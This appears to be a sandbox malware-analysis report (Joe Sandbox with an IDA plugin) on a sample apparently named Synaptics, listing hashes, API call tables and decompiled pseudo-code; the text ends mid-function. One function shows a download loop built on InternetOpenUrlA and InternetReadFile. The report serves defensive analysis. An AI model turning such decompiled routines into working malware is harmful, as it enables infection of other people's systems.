                                                                                                                                                                                                                            • Opcode ID: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                                                                                                                                                                                            • Instruction ID: c7ec2d223f710dc91b05457c805857c5415938e4303d673742531becb7789678
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9171F670A04104EFCB04DFA9C589EADB3F5AF48305F2941FAE808DB362D775AE459B44
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E004348A8(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                            				long _t27;
                                                                                                                                                                                                                            				long _t34;
                                                                                                                                                                                                                            				int _t42;
                                                                                                                                                                                                                            				int _t43;
                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t54 = __edx;
                                                                                                                                                                                                                            				_t57 = __eax;
                                                                                                                                                                                                                            				_push(_t60);
                                                                                                                                                                                                                            				_push(0x434993);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t60 + 0xfffffff8;
                                                                                                                                                                                                                            				if(__edx >= 0) {
                                                                                                                                                                                                                            					_t21 = SendMessageA(E00441704( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0); // executed
                                                                                                                                                                                                                            					_t42 = _t21;
                                                                                                                                                                                                                            					if(_t42 < 0) {
                                                                                                                                                                                                                            						_t43 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
                                                                                                                                                                                                                            						if(_t43 >= 0) {
                                                                                                                                                                                                                            							_t27 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
                                                                                                                                                                                                                            							if(_t27 != 0) {
                                                                                                                                                                                                                            								_t42 = _t43 + _t27;
                                                                                                                                                                                                                            								E00404CCC( &_v12, _v8, 0x4349ac);
                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00404CCC( &_v12, 0x4349ac, _v8);
                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                            						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42); // executed
                                                                                                                                                                                                                            						_t34 = E00404E80(_v12);
                                                                                                                                                                                                                            						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t50);
                                                                                                                                                                                                                            				 *[fs:eax] = _t50;
                                                                                                                                                                                                                            				_push(0x43499a);
                                                                                                                                                                                                                            				return E004049C0( &_v12);
                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004348E4
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00434913
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0043492F
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0043495A
                                                                                                                                                                                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00434978
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                            • Opcode ID: ffe0ecfc46be5565c031e4ce40711d918fc9cf30ddcbd8c6808e49f6dfa3db42
                                                                                                                                                                                                                            • Instruction ID: 60fe2270a456efbc5898118594648b470be5076c4c12df513f5ffd0388d1f25b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffe0ecfc46be5565c031e4ce40711d918fc9cf30ddcbd8c6808e49f6dfa3db42
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5219BB1644704ABE710ABB6CC82F9B76ACEF84718F10453EB501A73D2DB78BD00C559
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E00454A44(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                            				struct HMENU__* _t64;
                                                                                                                                                                                                                            				struct HMENU__* _t70;
                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                            				intOrPtr _t87;
                                                                                                                                                                                                                            				void* _t92;
                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                            				intOrPtr _t113;
                                                                                                                                                                                                                            				void* _t116;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t109 = __edi;
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_t113 = __edx;
                                                                                                                                                                                                                            				_t92 = __eax;
                                                                                                                                                                                                                            				_push(_t116);
                                                                                                                                                                                                                            				_push(0x454c0a);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t116 + 0xfffffff0;
                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                            					_t39 =  *((intOrPtr*)(_t92 + 0x248));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
                                                                                                                                                                                                                            						E0044E3BC(_t39, 0, _t109, 0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
                                                                                                                                                                                                                            						_t113 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
                                                                                                                                                                                                                            					if(_t113 != 0) {
                                                                                                                                                                                                                            						E00421C0C(_t113, _t92);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
                                                                                                                                                                                                                            						_t41 = E00441A08(_t92);
                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                            						if(_t41 != 0) {
                                                                                                                                                                                                                            							SetMenu(E00441704(_t92), 0); // executed
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L30;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
                                                                                                                                                                                                                            							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                                                                                                                                                                                                                            								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
                                                                                                                                                                                                                            								if( *((char*)(_t92 + 0x22f)) != 1) {
                                                                                                                                                                                                                            									_t54 = E00441A08(_t92);
                                                                                                                                                                                                                            									__eflags = _t54;
                                                                                                                                                                                                                            									if(_t54 != 0) {
                                                                                                                                                                                                                            										SetMenu(E00441704(_t92), 0);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							L21:
                                                                                                                                                                                                                            							if(E00441A08(_t92) != 0) {
                                                                                                                                                                                                                            								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                                                                                                                                                                                            								_t110 = _t61;
                                                                                                                                                                                                                            								_t64 = GetMenu(E00441704(_t92));
                                                                                                                                                                                                                            								_t138 = _t61 - _t64;
                                                                                                                                                                                                                            								if(_t61 != _t64) {
                                                                                                                                                                                                                            									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                                                                                                                                                                                            									SetMenu(E00441704(_t92), _t70);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								E0044E3BC(_t113, E00441704(_t92), _t110, _t138);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L30:
                                                                                                                                                                                                                            							if( *((char*)(_t92 + 0x22e)) != 0) {
                                                                                                                                                                                                                            								E00455B08(_t92, 1);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							E0045497C(_t92);
                                                                                                                                                                                                                            							_pop(_t98);
                                                                                                                                                                                                                            							 *[fs:eax] = _t98;
                                                                                                                                                                                                                            							_push(0x454c11);
                                                                                                                                                                                                                            							return E004049C0( &_v20);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t77 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            				_t79 = E00458274(_t77) - 1;
                                                                                                                                                                                                                            				if(_t79 >= 0) {
                                                                                                                                                                                                                            					_v8 = _t79 + 1;
                                                                                                                                                                                                                            					_t111 = 0;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t81 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            						if(_t113 ==  *((intOrPtr*)(E00458260(_t81, _t111) + 0x248))) {
                                                                                                                                                                                                                            							_t83 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            							if(_t92 != E00458260(_t83, _t111)) {
                                                                                                                                                                                                                            								_v16 =  *((intOrPtr*)(_t113 + 8));
                                                                                                                                                                                                                            								_v12 = 0xb;
                                                                                                                                                                                                                            								_t87 =  *0x49d8b4; // 0x423118
                                                                                                                                                                                                                            								E00406A70(_t87,  &_v20);
                                                                                                                                                                                                                            								E0040D180(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
                                                                                                                                                                                                                            								E00404378();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t111 = _t111 + 1;
                                                                                                                                                                                                                            						_t10 =  &_v8;
                                                                                                                                                                                                                            						 *_t10 = _v8 - 1;
                                                                                                                                                                                                                            					} while ( *_t10 != 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetMenu.USER32(00000000), ref: 00454B68
                                                                                                                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 00454B85
                                                                                                                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 00454BBA
                                                                                                                                                                                                                            • SetMenu.USER32(00000000,00000000,00000000,00454C0A), ref: 00454BD6
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$LoadString
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3688185913-0
                                                                                                                                                                                                                            • Opcode ID: 9ef444e933b09877c328c4c92fa3845e43b2cad6075fb8db61f2460728ee00b7
                                                                                                                                                                                                                            • Instruction ID: 8074770e88abfcf8b34beed0e108b3c66a7315ec12ddf3ed763e984ff9a80418
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ef444e933b09877c328c4c92fa3845e43b2cad6075fb8db61f2460728ee00b7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21518130A043445ADB61EF6A888575A7AA4AB8430DF0545BBEC059F3A3CA7CEC89875D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E00474D50(void* __eax, void* __ebx, intOrPtr __edx, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				void _v1060;
                                                                                                                                                                                                                            				char _v1392;
                                                                                                                                                                                                                            				char _v1856;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                            				DWORD* _t57;
                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t72 = _t73;
                                                                                                                                                                                                                            				_t74 = _t73 + 0xfffff8c4;
                                                                                                                                                                                                                            				_v1856 = 0;
                                                                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t70 = __eax;
                                                                                                                                                                                                                            				_t57 =  &_v24;
                                                                                                                                                                                                                            				_push(_t72);
                                                                                                                                                                                                                            				_push(0x474f77);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t74;
                                                                                                                                                                                                                            				E00402B68(0,  &_v1856);
                                                                                                                                                                                                                            				E00409E18(_v1856,  &_v28);
                                                                                                                                                                                                                            				_t32 = InternetOpenA(E00404E80(_v28), 0, 0, 0, 0); // executed
                                                                                                                                                                                                                            				_v16 = _t32;
                                                                                                                                                                                                                            				_push(_t72);
                                                                                                                                                                                                                            				_push(0x474e92);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t74;
                                                                                                                                                                                                                            				_t37 = InternetOpenUrlA(_v16, E00404E80(_t70), 0, 0, 0x84000000, 0); // executed
                                                                                                                                                                                                                            				_v20 = _t37;
                                                                                                                                                                                                                            				_push(_t72);
                                                                                                                                                                                                                            				_push(0x474e74);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t74;
                                                                                                                                                                                                                            				E00402F1C( &_v1392, _v8, 0);
                                                                                                                                                                                                                            				E004028C4(E004035E4());
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					InternetReadFile(_v20,  &_v1060, 0x400, _t57); // executed
                                                                                                                                                                                                                            					_t48 = E0040306C(0); // executed
                                                                                                                                                                                                                            					E004028C4(_t48);
                                                                                                                                                                                                                            				} while ( *_t57 != 0);
                                                                                                                                                                                                                            				E004028C4(E0040308C( &_v1392));
                                                                                                                                                                                                                            				_v9 = 1;
                                                                                                                                                                                                                            				_pop(_t68);
                                                                                                                                                                                                                            				 *[fs:eax] = _t68;
                                                                                                                                                                                                                            				_push(E00474E7B);
                                                                                                                                                                                                                            				return InternetCloseHandle(_v20);
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 00402B8C
                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(00000001,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00474E6E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$FileOpen$CloseHandleModuleNameRead
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1785656124-0
                                                                                                                                                                                                                            • Opcode ID: 55f5dc7776fc9cc51cd03a9ca73dbc10e30324fa73b2847c15f1e53668a756e6
                                                                                                                                                                                                                            • Instruction ID: 9dd8df19d1045a063bc6dcad90270211b168fb7c8f28217f7d4554014ce166d6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55f5dc7776fc9cc51cd03a9ca73dbc10e30324fa73b2847c15f1e53668a756e6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D318670A00218ABDB11DFA5DC52BAEB7B8EB48704F91447AF504B72C1D7786A00CF68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E0041E198(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                                                                                                                                                                                                                            				CHAR* _v8;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				struct HRSRC__* _t12;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				CHAR* _t24;
                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                            				struct HRSRC__* _t29;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t31;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = _t24;
                                                                                                                                                                                                                            				_t31 = __edx;
                                                                                                                                                                                                                            				_t23 = __eax;
                                                                                                                                                                                                                            				_t12 = FindResourceA(__edx, _v8, _a4); // executed
                                                                                                                                                                                                                            				_t29 = _t12;
                                                                                                                                                                                                                            				 *(_t23 + 0x10) = _t29;
                                                                                                                                                                                                                            				_t33 = _t29;
                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                            					E0041E128(_t23, _t24, _t29, _t31, _t33, _t32);
                                                                                                                                                                                                                            					_pop(_t24);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t5 = _t23 + 0x10; // 0x41e23c
                                                                                                                                                                                                                            				_t30 = LoadResource(_t31,  *_t5);
                                                                                                                                                                                                                            				 *(_t23 + 0x14) = _t30;
                                                                                                                                                                                                                            				_t34 = _t30;
                                                                                                                                                                                                                            				if(_t30 == 0) {
                                                                                                                                                                                                                            					E0041E128(_t23, _t24, _t30, _t31, _t34, _t32);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t7 = _t23 + 0x10; // 0x41e23c
                                                                                                                                                                                                                            				_push(SizeofResource(_t31,  *_t7));
                                                                                                                                                                                                                            				_t8 = _t23 + 0x14; // 0x41dd60
                                                                                                                                                                                                                            				_t18 = LockResource( *_t8);
                                                                                                                                                                                                                            				_pop(_t25);
                                                                                                                                                                                                                            				return E0041DD20(_t23, _t25, _t18);
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00400000,?,?), ref: 0041E1AF
                                                                                                                                                                                                                            • LoadResource.KERNEL32(00400000,0041E23C,00419048,00400000,00000001,00000000,?,0041E108,?,00000000,?,00000000,?,004767C5,0000000A,KBHKS), ref: 0041E1C9
                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00400000,0041E23C,00400000,0041E23C,00419048,00400000,00000001,00000000,?,0041E108,?,00000000,?,00000000,?,004767C5), ref: 0041E1E3
                                                                                                                                                                                                                            • LockResource.KERNEL32(0041DD60,00000000,00400000,0041E23C,00400000,0041E23C,00419048,00400000,00000001,00000000,?,0041E108,?,00000000,?,00000000), ref: 0041E1ED
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3473537107-0
                                                                                                                                                                                                                            • Opcode ID: 9422232bda4f755a2221c3238b95ec70872abee181a7fbf85ff6cd90fcdaa231
                                                                                                                                                                                                                            • Instruction ID: 0493972d3240682b7dd301822f78e45fd4f377a97d2dc7c1e7558ac95a832863
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9422232bda4f755a2221c3238b95ec70872abee181a7fbf85ff6cd90fcdaa231
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECF04BB6A042047F9704EE5AAC81DAB77DCEE88364320006EFD08DB342DA38ED4143B9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E0047847C(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                            				signed int* _v24;
                                                                                                                                                                                                                            				signed int* _v28;
                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                            				signed int* _v36;
                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                            				char _v84;
                                                                                                                                                                                                                            				signed int _v1620;
                                                                                                                                                                                                                            				signed int _t142;
                                                                                                                                                                                                                            				intOrPtr _t143;
                                                                                                                                                                                                                            				intOrPtr* _t144;
                                                                                                                                                                                                                            				intOrPtr _t147;
                                                                                                                                                                                                                            				signed char _t157;
                                                                                                                                                                                                                            				signed char _t158;
                                                                                                                                                                                                                            				signed int* _t165;
                                                                                                                                                                                                                            				signed int _t207;
                                                                                                                                                                                                                            				signed int _t208;
                                                                                                                                                                                                                            				void* _t209;
                                                                                                                                                                                                                            				intOrPtr _t224;
                                                                                                                                                                                                                            				intOrPtr _t225;
                                                                                                                                                                                                                            				intOrPtr _t226;
                                                                                                                                                                                                                            				intOrPtr _t227;
                                                                                                                                                                                                                            				signed int _t256;
                                                                                                                                                                                                                            				intOrPtr* _t258;
                                                                                                                                                                                                                            				void* _t260;
void* _t261;
intOrPtr _t262;
void* _t276;

_t276 = __fp0;
_t260 = _t261;
_t262 = _t261 + 0xfffff9b0;
_v12 = __ecx;
_t258 = __edx;
_v8 = __eax;
_t224 =  *0x417dc0; // 0x417dc4
E004053AC( &_v84, _t224);
_push(_t260);
_push(0x4787af);
_push( *[fs:eax]);
 *[fs:eax] = _t262;
_v20 = 0;
_t211 = 0;
_push(_t260);
_push(0x47878c);
_push( *[fs:ecx]);
 *[fs:ecx] = _t262;
_t256 =  *(__edx + 1) & 0x000000ff;
if(_t256 > 0x40) {
	_t211 =  *0x49d980; // 0x477e3c
	E0040D200(_t211, 1);
	E00404378();
}
if(_t256 == 0) {
	L25:
	_v52 =  &_v1620;
	_v48 = _v12 + 4;
	_v44 = _t256;
	_v40 = 0;
	_t225 =  *_v12;
	_t142 =  *_t258;
	if(0 != 4) {
		__eflags = 0 - 1;
		if(0 == 1) {
			__eflags = _t256;
			if(__eflags == 0) {
				__eflags = _a4;
				if(__eflags != 0) {
					_t142 = 3;
				}
			}
		}
	} else {
		if((_v1620 & 0x00000fff) == 9) {
			_t142 = 8;
		}
		 *_v12 = 0xfffffffd;
		_v48 = _v48 - 4;
		_v40 = _v40 + 1;
	}
	_push(0);
	_push( &_v84);
	_push(_a4);
	_push( &_v52);
	_push(_t142);
	_push(0);
	_t143 =  *0x49d770; // 0x49b500
	_push(_t143);
	_push(_t225);
	_t144 = _v8;
	_push(_t144);
	if( *((intOrPtr*)( *_t144 + 0x18))() != 0) {
		E00478A5C();
	}
	_t207 = _v20;
	if(_t207 == 0) {
		L39:
		_t147 = 0;
		_pop(_t226);
		 *[fs:eax] = _t226;
		_push(E00478793);
		_t208 = _v20;
		if(_t208 == 0) {
			L41:
			return _t147;
		} else {
			goto L40;
		}
		do {
			L40:
			_t208 = _t208 - 1;
			_t147 =  *((intOrPtr*)(_t260 + _t208 * 8 - 0x250));
			_push(_t147);
			L00417E14();
		} while (_t208 != 0);
		goto L41;
	} else {
		do {
			_t207 = _t207 - 1;
			_t148 = _t260 + _t207 * 8 - 0x250;
			_t227 =  *((intOrPtr*)(_t260 + _t207 * 8 - 0x250 + 4));
			_t272 = _t227;
			if(_t227 != 0) {
				E00405950( *_t148,  *_t148, _t227, _t272);
			}
		} while (_t207 != 0);
		goto L39;
	}
} else {
	_v24 = _a8;
	_v28 = _t260 + (_t256 + _t256) * 8 - 0x650;
	_t209 = 0;
	do {
		_v28 = _v28 - 0x10;
		_t157 =  *((intOrPtr*)(_t258 + _t209 + 3));
		_v16 = _t157 & 0x7f;
		_t158 = _t157 & 0x00000080;
		if(_v16 != 0xa) {
			__eflags = _v16 - 0x48;
			if(_v16 != 0x48) {
				__eflags = _t158;
				if(_t158 == 0) {
					__eflags = _v16 - 0xc;
					if(_v16 != 0xc) {
						 *_v28 = _v16;
						_v28[2] =  *_v24;
						__eflags = _v16 - 5;
						if(_v16 >= 5) {
							__eflags = _v16 - 7;
							if(_v16 <= 7) {
								_t93 =  &_v24;
								 *_t93 =  &(_v24[1]);
								__eflags =  *_t93;
								_v28[3] =  *_v24;
							}
						}
					} else {
						__eflags =  *_v24 - 0x100;
						if( *_v24 != 0x100) {
							_t165 = _v24;
